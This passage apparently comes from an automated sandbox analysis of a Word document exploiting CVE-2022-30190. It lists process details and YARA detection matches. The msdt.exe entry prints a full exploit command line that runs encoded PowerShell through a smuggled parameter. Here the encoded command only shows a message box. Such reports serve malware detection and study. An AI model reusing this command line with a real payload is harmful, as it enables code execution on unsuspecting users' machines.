                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                              Imagebase:0xe80000
                                                                                                                                                              File size:1937688 bytes
                                                                                                                                                              MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Target ID:1
                                                                                                                                                              Start time:23:03:11
                                                                                                                                                              Start date:03/06/2022
                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                              Imagebase:0xb80000
                                                                                                                                                              File size:466688 bytes
                                                                                                                                                              MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate

                                                                                                                                                              General

                                                                                                                                                              Target ID:9
                                                                                                                                                              Start time:23:03:27
                                                                                                                                                              Start date:03/06/2022
                                                                                                                                                              Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                                                                                                                                                              Imagebase:0xab0000
                                                                                                                                                              File size:1508352 bytes
                                                                                                                                                              MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.553703750.0000000003140000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                              • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.554020054.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                              • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.553580729.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                              • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.553717920.0000000003148000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                              Reputation:moderate

                                                                                                                                                              Disassembly

                                                                                                                                                              No disassembly